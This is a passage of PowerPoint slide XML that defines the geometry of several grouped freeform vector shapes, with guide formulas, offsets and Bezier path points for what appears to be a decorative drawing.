                        <a:pt x="517" y="81"/>
                        <a:pt x="517" y="81"/>
                        <a:pt x="517" y="81"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="517" y="49"/>
                        <a:pt x="491" y="10"/>
                        <a:pt x="460" y="1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8" name="Freeform 14839"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5537" y="2773"/>
                  <a:ext cx="52" cy="42"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 105 w 113"/>
                    <a:gd name="T1" fmla="*/ 45 h 91"/>
                    <a:gd name="T2" fmla="*/ 57 w 113"/>
                    <a:gd name="T3" fmla="*/ 0 h 91"/>
                    <a:gd name="T4" fmla="*/ 57 w 113"/>
                    <a:gd name="T5" fmla="*/ 0 h 91"/>
                    <a:gd name="T6" fmla="*/ 56 w 113"/>
                    <a:gd name="T7" fmla="*/ 0 h 91"/>
                    <a:gd name="T8" fmla="*/ 0 w 113"/>
                    <a:gd name="T9" fmla="*/ 73 h 91"/>
                    <a:gd name="T10" fmla="*/ 113 w 113"/>
                    <a:gd name="T11" fmla="*/ 80 h 91"/>
                    <a:gd name="T12" fmla="*/ 105 w 113"/>
                    <a:gd name="T13" fmla="*/ 45 h 9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13"/>
                    <a:gd name="T22" fmla="*/ 0 h 91"/>
                    <a:gd name="T23" fmla="*/ 113 w 113"/>
                    <a:gd name="T24" fmla="*/ 91 h 9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13" h="91">
                      <a:moveTo>
                        <a:pt x="105" y="45"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="24"/>
                        <a:pt x="77" y="6"/>
                        <a:pt x="57" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="9"/>
                        <a:pt x="0" y="42"/>
                        <a:pt x="0" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="91"/>
                        <a:pt x="82" y="87"/>
                        <a:pt x="113" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="69"/>
                        <a:pt x="110" y="57"/>
                        <a:pt x="105" y="4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9" name="Freeform 14840"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5228" y="2540"/>
                  <a:ext cx="550" cy="233"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 467 w 1198"/>
                    <a:gd name="T1" fmla="*/ 0 h 506"/>
                    <a:gd name="T2" fmla="*/ 0 w 1198"/>
                    <a:gd name="T3" fmla="*/ 126 h 506"/>
                    <a:gd name="T4" fmla="*/ 730 w 1198"/>
                    <a:gd name="T5" fmla="*/ 506 h 506"/>
                    <a:gd name="T6" fmla="*/ 1198 w 1198"/>
                    <a:gd name="T7" fmla="*/ 380 h 506"/>
                    <a:gd name="T8" fmla="*/ 467 w 1198"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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98"/>
                    <a:gd name="T16" fmla="*/ 0 h 506"/>
                    <a:gd name="T17" fmla="*/ 1198 w 1198"/>
                    <a:gd name="T18" fmla="*/ 506 h 5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98" h="506">
                      <a:moveTo>
                        <a:pt x="467" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="126"/>
                        <a:pt x="0" y="126"/>
                        <a:pt x="0" y="126"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="730" y="506"/>
                        <a:pt x="730" y="506"/>
                        <a:pt x="730" y="506"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1198" y="380"/>
                        <a:pt x="1198" y="380"/>
                        <a:pt x="1198" y="380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1198" y="380"/>
                        <a:pt x="549" y="0"/>
                        <a:pt x="467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80" name="Freeform 14841"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5228" y="2598"/>
                  <a:ext cx="335" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 730"/>
                    <a:gd name="T1" fmla="*/ 0 h 380"/>
                    <a:gd name="T2" fmla="*/ 730 w 730"/>
                    <a:gd name="T3" fmla="*/ 380 h 380"/>
                    <a:gd name="T4" fmla="*/ 358 w 730"/>
                    <a:gd name="T5" fmla="*/ 280 h 380"/>
                    <a:gd name="T6" fmla="*/ 0 w 730"/>
                    <a:gd name="T7" fmla="*/ 198 h 380"/>
                    <a:gd name="T8" fmla="*/ 0 w 730"/>
                    <a:gd name="T9" fmla="*/ 0 h 3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30"/>
                    <a:gd name="T16" fmla="*/ 0 h 380"/>
                    <a:gd name="T17" fmla="*/ 730 w 730"/>
                    <a:gd name="T18" fmla="*/ 380 h 38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30" h="380">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="81" y="0"/>
                        <a:pt x="730" y="380"/>
                        <a:pt x="730" y="380"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="358" y="280"/>
                        <a:pt x="358" y="280"/>
                        <a:pt x="358" y="280"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="198"/>
                        <a:pt x="0" y="198"/>
                        <a:pt x="0" y="198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81" name="Freeform 14842"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5513" y="3079"/>
                  <a:ext cx="139" cy="152"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 241 w 302"/>
                    <a:gd name="T1" fmla="*/ 96 h 332"/>
                    <a:gd name="T2" fmla="*/ 66 w 302"/>
                    <a:gd name="T3" fmla="*/ 20 h 332"/>
                    <a:gd name="T4" fmla="*/ 66 w 302"/>
                    <a:gd name="T5" fmla="*/ 20 h 332"/>
                    <a:gd name="T6" fmla="*/ 17 w 302"/>
                    <a:gd name="T7" fmla="*/ 33 h 332"/>
                    <a:gd name="T8" fmla="*/ 27 w 302"/>
                    <a:gd name="T9" fmla="*/ 54 h 332"/>
                    <a:gd name="T10" fmla="*/ 58 w 302"/>
                    <a:gd name="T11" fmla="*/ 235 h 332"/>
                    <a:gd name="T12" fmla="*/ 143 w 302"/>
                    <a:gd name="T13" fmla="*/ 304 h 332"/>
                    <a:gd name="T14" fmla="*/ 156 w 302"/>
                    <a:gd name="T15" fmla="*/ 332 h 332"/>
                    <a:gd name="T16" fmla="*/ 221 w 302"/>
                    <a:gd name="T17" fmla="*/ 315 h 332"/>
                    <a:gd name="T18" fmla="*/ 221 w 302"/>
                    <a:gd name="T19" fmla="*/ 315 h 332"/>
                    <a:gd name="T20" fmla="*/ 252 w 302"/>
                    <a:gd name="T21" fmla="*/ 300 h 332"/>
                    <a:gd name="T22" fmla="*/ 241 w 302"/>
                    <a:gd name="T23" fmla="*/ 96 h 33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02"/>
                    <a:gd name="T37" fmla="*/ 0 h 332"/>
                    <a:gd name="T38" fmla="*/ 302 w 302"/>
                    <a:gd name="T39" fmla="*/ 332 h 332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02" h="332">
                      <a:moveTo>
                        <a:pt x="241" y="96"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="30"/>
                        <a:pt x="117" y="0"/>
                        <a:pt x="66" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="20"/>
                        <a:pt x="66" y="20"/>
                        <a:pt x="66" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="54"/>
                        <a:pt x="27" y="54"/>
                        <a:pt x="27" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="173"/>
                        <a:pt x="58" y="235"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="267"/>
                        <a:pt x="112" y="291"/>
                        <a:pt x="143" y="304"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332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32" y="312"/>
                        <a:pt x="243" y="307"/>
                        <a:pt x="252" y="300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="262"/>
                        <a:pt x="298" y="170"/>
                        <a:pt x="241" y="96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82" name="Freeform 14843"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5482" y="3083"/>
                  <a:ext cx="141" cy="159"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 306"/>
                    <a:gd name="T1" fmla="*/ 308 h 347"/>
                    <a:gd name="T2" fmla="*/ 61 w 306"/>
                    <a:gd name="T3" fmla="*/ 243 h 347"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 39 h 347"/>
                    <a:gd name="T6" fmla="*/ 245 w 306"/>
                    <a:gd name="T7" fmla="*/ 104 h 347"/>
                    <a:gd name="T8" fmla="*/ 255 w 306"/>
                    <a:gd name="T9" fmla="*/ 308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347"/>
                    <a:gd name="T17" fmla="*/ 306 w 306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347">
                      <a:moveTo>
                        <a:pt x="255" y="308"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="347"/>
                        <a:pt x="118" y="318"/>
                        <a:pt x="61" y="243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="169"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="51" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="0"/>
                        <a:pt x="188" y="30"/>
                        <a:pt x="245" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="178"/>
                        <a:pt x="306" y="270"/>
                        <a:pt x="255" y="30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83" name="Freeform 14844"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5510" y="3114"/>
                  <a:ext cx="85" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 155 w 186"/>
                    <a:gd name="T1" fmla="*/ 187 h 211"/>
                    <a:gd name="T2" fmla="*/ 37 w 186"/>
                    <a:gd name="T3" fmla="*/ 148 h 211"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 24 h 211"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 211"/>
                    <a:gd name="T8" fmla="*/ 155 w 186"/>
                    <a:gd name="T9" fmla="*/ 187 h 2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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 211"/>
                    <a:gd name="T17" fmla="*/ 186 w 186"/>
                    <a:gd name="T18" fmla="*/ 211 h 2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6" h="211">
                      <a:moveTo>
                        <a:pt x="155" y="187"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="211"/>
                        <a:pt x="72" y="193"/>
                        <a:pt x="37" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="103"/>
                        <a:pt x="0" y="47"/>
                        <a:pt x="31" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="0"/>
                        <a:pt x="114" y="18"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="108"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="155" y="18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84" name="Freeform 14845"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5415" y="3048"/>
                  <a:ext cx="253" cy="120"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 536 w 552"/>
                    <a:gd name="T1" fmla="*/ 152 h 261"/>
                    <a:gd name="T2" fmla="*/ 421 w 552"/>
                    <a:gd name="T3" fmla="*/ 53 h 261"/>
                    <a:gd name="T4" fmla="*/ 210 w 552"/>
                    <a:gd name="T5" fmla="*/ 0 h 261"/>
                    <a:gd name="T6" fmla="*/ 27 w 552"/>
                    <a:gd name="T7" fmla="*/ 123 h 261"/>
                    <a:gd name="T8" fmla="*/ 0 w 552"/>
                    <a:gd name="T9" fmla="*/ 211 h 261"/>
                    <a:gd name="T10" fmla="*/ 121 w 552"/>
                    <a:gd name="T11" fmla="*/ 243 h 261"/>
                    <a:gd name="T12" fmla="*/ 121 w 552"/>
                    <a:gd name="T13" fmla="*/ 150 h 261"/>
                    <a:gd name="T14" fmla="*/ 229 w 552"/>
                    <a:gd name="T15" fmla="*/ 49 h 261"/>
                    <a:gd name="T16" fmla="*/ 413 w 552"/>
                    <a:gd name="T17" fmla="*/ 148 h 261"/>
                    <a:gd name="T18" fmla="*/ 466 w 552"/>
                    <a:gd name="T19" fmla="*/ 241 h 261"/>
                    <a:gd name="T20" fmla="*/ 544 w 552"/>
                    <a:gd name="T21" fmla="*/ 261 h 261"/>
                    <a:gd name="T22" fmla="*/ 536 w 552"/>
                    <a:gd name="T23" fmla="*/ 152 h 26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552"/>
                    <a:gd name="T37" fmla="*/ 0 h 261"/>
                    <a:gd name="T38" fmla="*/ 552 w 552"/>
                    <a:gd name="T39" fmla="*/ 261 h 26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552" h="261">
                      <a:moveTo>
                        <a:pt x="536" y="152"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="527" y="143"/>
                        <a:pt x="439" y="59"/>
                        <a:pt x="421" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="403" y="46"/>
                        <a:pt x="233" y="0"/>
                        <a:pt x="210" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="187" y="0"/>
                        <a:pt x="40" y="94"/>
                        <a:pt x="27" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="132"/>
                        <a:pt x="7" y="179"/>
                        <a:pt x="0" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="243"/>
                        <a:pt x="121" y="243"/>
                        <a:pt x="121" y="243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="238"/>
                        <a:pt x="112" y="174"/>
                        <a:pt x="121" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="131" y="126"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="229" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="260" y="47"/>
                        <a:pt x="346" y="64"/>
                        <a:pt x="413" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="440" y="182"/>
                        <a:pt x="461" y="219"/>
                        <a:pt x="466" y="241"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="544" y="261"/>
                        <a:pt x="544" y="261"/>
                        <a:pt x="544" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="552" y="230"/>
                        <a:pt x="541" y="157"/>
                        <a:pt x="536" y="152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85" name="Freeform 14846"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5933" y="3034"/>
                  <a:ext cx="74" cy="53"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 378"/>
                    <a:gd name="T1" fmla="*/ 272 h 272"/>
                    <a:gd name="T2" fmla="*/ 0 w 378"/>
                    <a:gd name="T3" fmla="*/ 102 h 272"/>
                    <a:gd name="T4" fmla="*/ 378 w 378"/>
                    <a:gd name="T5" fmla="*/ 0 h 272"/>
                    <a:gd name="T6" fmla="*/ 378 w 378"/>
                    <a:gd name="T7" fmla="*/ 170 h 272"/>
                    <a:gd name="T8" fmla="*/ 0 w 378"/>
                    <a:gd name="T9" fmla="*/ 272 h 27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78"/>
                    <a:gd name="T16" fmla="*/ 0 h 272"/>
                    <a:gd name="T17" fmla="*/ 378 w 378"/>
                    <a:gd name="T18" fmla="*/ 272 h 27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78" h="272">
                      <a:moveTo>
                        <a:pt x="0" y="272"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="102"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="170"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27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FFC269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86" name="Freeform 14847"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5673" y="3106"/>
                  <a:ext cx="73" cy="53"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 378"/>
                    <a:gd name="T1" fmla="*/ 271 h 271"/>
                    <a:gd name="T2" fmla="*/ 0 w 378"/>
                    <a:gd name="T3" fmla="*/ 101 h 271"/>
                    <a:gd name="T4" fmla="*/ 378 w 378"/>
                    <a:gd name="T5" fmla="*/ 0 h 271"/>
                    <a:gd name="T6" fmla="*/ 378 w 378"/>
                    <a:gd name="T7" fmla="*/ 170 h 271"/>
                    <a:gd name="T8" fmla="*/ 0 w 378"/>
                    <a:gd name="T9" fmla="*/ 271 h 27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78"/>
                    <a:gd name="T16" fmla="*/ 0 h 271"/>
                    <a:gd name="T17" fmla="*/ 378 w 378"/>
                    <a:gd name="T18" fmla="*/ 271 h 27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78" h="271">
                      <a:moveTo>
                        <a:pt x="0" y="271"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="170"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="27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FFC269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33" name="Group 14534"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm rot="20960195" flipH="1">
              <a:off x="9288827" y="1428773"/>
              <a:ext cx="935038" cy="296863"/>
              <a:chOff x="342" y="-467"/>
              <a:chExt cx="13108" cy="4140"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="734" name="Freeform 14535"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7900" y="797"/>
                <a:ext cx="1276" cy="693"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 324"/>
                  <a:gd name="T1" fmla="*/ 11 h 175"/>
                  <a:gd name="T2" fmla="*/ 66 w 324"/>
                  <a:gd name="T3" fmla="*/ 11 h 175"/>
                  <a:gd name="T4" fmla="*/ 20 w 324"/>
                  <a:gd name="T5" fmla="*/ 38 h 175"/>
                  <a:gd name="T6" fmla="*/ 9 w 324"/>
                  <a:gd name="T7" fmla="*/ 98 h 175"/>
                  <a:gd name="T8" fmla="*/ 9 w 324"/>
                  <a:gd name="T9" fmla="*/ 98 h 175"/>
                  <a:gd name="T10" fmla="*/ 10 w 324"/>
                  <a:gd name="T11" fmla="*/ 99 h 175"/>
                  <a:gd name="T12" fmla="*/ 13 w 324"/>
                  <a:gd name="T13" fmla="*/ 103 h 175"/>
                  <a:gd name="T14" fmla="*/ 272 w 324"/>
                  <a:gd name="T15" fmla="*/ 175 h 175"/>
                  <a:gd name="T16" fmla="*/ 324 w 324"/>
                  <a:gd name="T17" fmla="*/ 92 h 175"/>
                  <a:gd name="T18" fmla="*/ 66 w 324"/>
                  <a:gd name="T19" fmla="*/ 11 h 1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24"/>
                  <a:gd name="T31" fmla="*/ 0 h 175"/>
                  <a:gd name="T32" fmla="*/ 324 w 324"/>
                  <a:gd name="T33" fmla="*/ 175 h 1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24" h="175">
                    <a:moveTo>
                      <a:pt x="66" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="11"/>
                      <a:pt x="33" y="21"/>
                      <a:pt x="20" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="59"/>
                      <a:pt x="0" y="83"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="10" y="98"/>
                      <a:pt x="10" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="101"/>
                      <a:pt x="12" y="102"/>
                      <a:pt x="13" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="121"/>
                      <a:pt x="107" y="155"/>
                      <a:pt x="272" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="239" y="0"/>
                      <a:pt x="66" y="1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5" name="Freeform 14536"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8862" y="1102"/>
                <a:ext cx="362" cy="411"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 92"/>
                  <a:gd name="T1" fmla="*/ 12 h 104"/>
                  <a:gd name="T2" fmla="*/ 19 w 92"/>
                  <a:gd name="T3" fmla="*/ 31 h 104"/>
                  <a:gd name="T4" fmla="*/ 16 w 92"/>
                  <a:gd name="T5" fmla="*/ 93 h 104"/>
                  <a:gd name="T6" fmla="*/ 74 w 92"/>
                  <a:gd name="T7" fmla="*/ 73 h 104"/>
                  <a:gd name="T8" fmla="*/ 77 w 92"/>
                  <a:gd name="T9" fmla="*/ 12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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 104"/>
                  <a:gd name="T17" fmla="*/ 92 w 92"/>
                  <a:gd name="T18" fmla="*/ 104 h 1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2" h="104">
                    <a:moveTo>
                      <a:pt x="77" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="0"/>
                      <a:pt x="36" y="9"/>
                      <a:pt x="19" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="54"/>
                      <a:pt x="0" y="81"/>
                      <a:pt x="16" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="104"/>
                      <a:pt x="57" y="95"/>
                      <a:pt x="74" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="51"/>
                      <a:pt x="92" y="23"/>
                      <a:pt x="77" y="12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6" name="Freeform 14537"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3583" y="2440"/>
                <a:ext cx="1276" cy="688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 324"/>
                  <a:gd name="T1" fmla="*/ 11 h 175"/>
                  <a:gd name="T2" fmla="*/ 66 w 324"/>
                  <a:gd name="T3" fmla="*/ 11 h 175"/>
                  <a:gd name="T4" fmla="*/ 20 w 324"/>
                  <a:gd name="T5" fmla="*/ 38 h 175"/>
                  <a:gd name="T6" fmla="*/ 9 w 324"/>
                  <a:gd name="T7" fmla="*/ 98 h 175"/>
                  <a:gd name="T8" fmla="*/ 9 w 324"/>
                  <a:gd name="T9" fmla="*/ 98 h 175"/>
                  <a:gd name="T10" fmla="*/ 10 w 324"/>
                  <a:gd name="T11" fmla="*/ 99 h 175"/>
                  <a:gd name="T12" fmla="*/ 13 w 324"/>
                  <a:gd name="T13" fmla="*/ 103 h 175"/>
                  <a:gd name="T14" fmla="*/ 272 w 324"/>
                  <a:gd name="T15" fmla="*/ 175 h 175"/>
                  <a:gd name="T16" fmla="*/ 324 w 324"/>
                  <a:gd name="T17" fmla="*/ 92 h 175"/>
                  <a:gd name="T18" fmla="*/ 66 w 324"/>
                  <a:gd name="T19" fmla="*/ 11 h 1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24"/>
                  <a:gd name="T31" fmla="*/ 0 h 175"/>
                  <a:gd name="T32" fmla="*/ 324 w 324"/>
                  <a:gd name="T33" fmla="*/ 175 h 1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24" h="175">
                    <a:moveTo>
                      <a:pt x="66" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="11"/>
                      <a:pt x="33" y="21"/>
                      <a:pt x="20" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="59"/>
                      <a:pt x="0" y="83"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="10" y="99"/>
                      <a:pt x="10" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="101"/>
                      <a:pt x="12" y="102"/>
                      <a:pt x="13" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="121"/>
                      <a:pt x="107" y="155"/>
                      <a:pt x="272" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="239" y="0"/>
                      <a:pt x="66" y="1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7" name="Freeform 14538"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4545" y="2746"/>
                <a:ext cx="362" cy="408"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 92"/>
                  <a:gd name="T1" fmla="*/ 11 h 103"/>
                  <a:gd name="T2" fmla="*/ 19 w 92"/>
                  <a:gd name="T3" fmla="*/ 30 h 103"/>
                  <a:gd name="T4" fmla="*/ 16 w 92"/>
                  <a:gd name="T5" fmla="*/ 92 h 103"/>
                  <a:gd name="T6" fmla="*/ 74 w 92"/>
                  <a:gd name="T7" fmla="*/ 72 h 103"/>
                  <a:gd name="T8" fmla="*/ 77 w 92"/>
                  <a:gd name="T9" fmla="*/ 11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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 103"/>
                  <a:gd name="T17" fmla="*/ 92 w 92"/>
                  <a:gd name="T18" fmla="*/ 103 h 10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2" h="103">
                    <a:moveTo>
                      <a:pt x="77" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="0"/>
